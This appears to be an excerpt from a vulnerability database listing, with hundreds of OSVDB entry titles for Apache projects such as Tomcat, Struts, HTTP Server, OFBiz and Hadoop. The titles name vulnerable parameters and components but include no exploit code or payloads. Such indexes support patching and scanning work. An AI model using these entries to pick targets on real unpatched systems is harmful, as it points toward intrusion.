| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
| [83339] Apache Roller Blogger Roll Unspecified XSS
| [83270] Apache Roller Unspecified Admin Action CSRF
| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
| [80300] Apache Wicket wicket:pageMapName Parameter XSS
| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
| [78331] Apache Tomcat Request Object Recycling Information Disclosure
| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
| [77593] Apache Struts Conversion Error OGNL Expression Injection
| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
| [74725] Apache Wicket Multi Window Support Unspecified XSS
| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
| [73644] Apache XML Security Signature Key Parsing Overflow DoS
| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
| [73154] Apache Archiva Multiple Unspecified CSRF
| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
| [72238] Apache Struts Action / Method Names <
| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
16293| [71557] Apache Tomcat HTML Manager Multiple XSS
16294| [71075] Apache Archiva User Management Page XSS
16295| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
16296| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
16297| [70924] Apache Continuum Multiple Admin Function CSRF
16298| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
16299| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
16300| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
16301| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
16302| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
16303| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
16304| [69520] Apache Archiva Administrator Credential Manipulation CSRF
16305| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
16306| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
16307| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
16308| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
16309| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
16310| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
16311| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
16312| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
16313| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
16314| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
16315| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
16316| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
16317| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
16318| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
16319| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
16320| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
16321| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
16322| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
16323| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
16324| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
16325| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
16326| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
16327| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
16328| [65054] Apache ActiveMQ Jetty Error Handler XSS
16329| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
16330| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
16331| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
16332| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
16333| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
16334| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
16335| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
16336| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
16337| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
16338| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
16339| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
16340| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
16341| [63895] Apache HTTP Server mod_headers Unspecified Issue
16342| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
16343| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
16344| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
16345| [63140] Apache Thrift Service Malformed Data Remote DoS
16346| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
16347| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
16348| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
16349| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
16350| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
| [60678] Apache Roller Comment Email Notification Manipulation DoS
| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
| [60232] PHP on Apache php.exe Direct Request Remote DoS
| [60176] Apache Tomcat Windows Installer Admin Default Password
| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
| [59944] Apache Hadoop jobhistory.jsp XSS
| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
| [59019] Apache mod_python Cookie Salting Weakness
| [59018] Apache Harmony Error Message Handling Overflow
| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
| [59010] Apache Solr get-file.jsp XSS
| [59009] Apache Solr action.jsp XSS
| [59008] Apache Solr analysis.jsp XSS
| [59007] Apache Solr schema.jsp Multiple Parameter XSS
| [59006] Apache Beehive select / checkbox Tag XSS
| [59005] Apache Beehive jpfScopeID Global Parameter XSS
| [59004] Apache Beehive Error Message XSS
| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
| [59002] Apache Jetspeed default-page.psml URI XSS
| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
| [59000] Apache CXF Unsigned Message Policy Bypass
| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
| [58993] Apache Hadoop browseBlock.jsp XSS
| [58991] Apache Hadoop browseDirectory.jsp XSS
| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
| [58974] Apache Sling /apps Script User Session Management Access Weakness
| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
| [58931] Apache Geronimo Cookie Parameters Validation Weakness
| [58930] Apache Xalan-C++ XPath Handling Remote DoS
| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
| [58805] Apache Derby Unauthenticated Database / Admin Access
| [58804] Apache Wicket Header Contribution Unspecified Issue
| [58803] Apache Wicket Session Fixation
| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
| [58799] Apache Tapestry Logging Cleartext Password Disclosure
| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
| [58796] Apache Jetspeed Unsalted Password Storage Weakness
| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
| [58775] Apache JSPWiki preview.jsp action Parameter XSS
| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
| [58770] Apache JSPWiki Group.jsp group Parameter XSS
| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58763] Apache JSPWiki Include Tag Multiple Script XSS
| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
| [58755] Apache Harmony DRLVM Non-public Class Member Access
| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
| [58725] Apache Tapestry Basic String ACL Bypass Weakness
| [58724] Apache Roller Logout Functionality Failure Session Persistence
| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
| [58687] Apache Axis Invalid wsdl Request XSS
| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
| [58685] Apache Velocity Template Designer Privileged Code Execution
| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
| [58667] Apache Roller Database Cleartext Passwords Disclosure
| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
| [56984] Apache Xerces2 Java Malformed XML Input DoS
| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
| [55056] Apache Tomcat Cross-application TLD File Manipulation
| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
| [54589] Apache Jserv Nonexistent JSP Request XSS
| [54122] Apache Struts s:a / s:url Tag href Element XSS
| [54093] Apache ActiveMQ Web Console JMS Message XSS
| [53932] Apache Geronimo Multiple Admin Function CSRF
| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
| [53930] Apache Geronimo /console/portal/ URI XSS
| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
| [53380] Apache Struts Unspecified XSS
| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
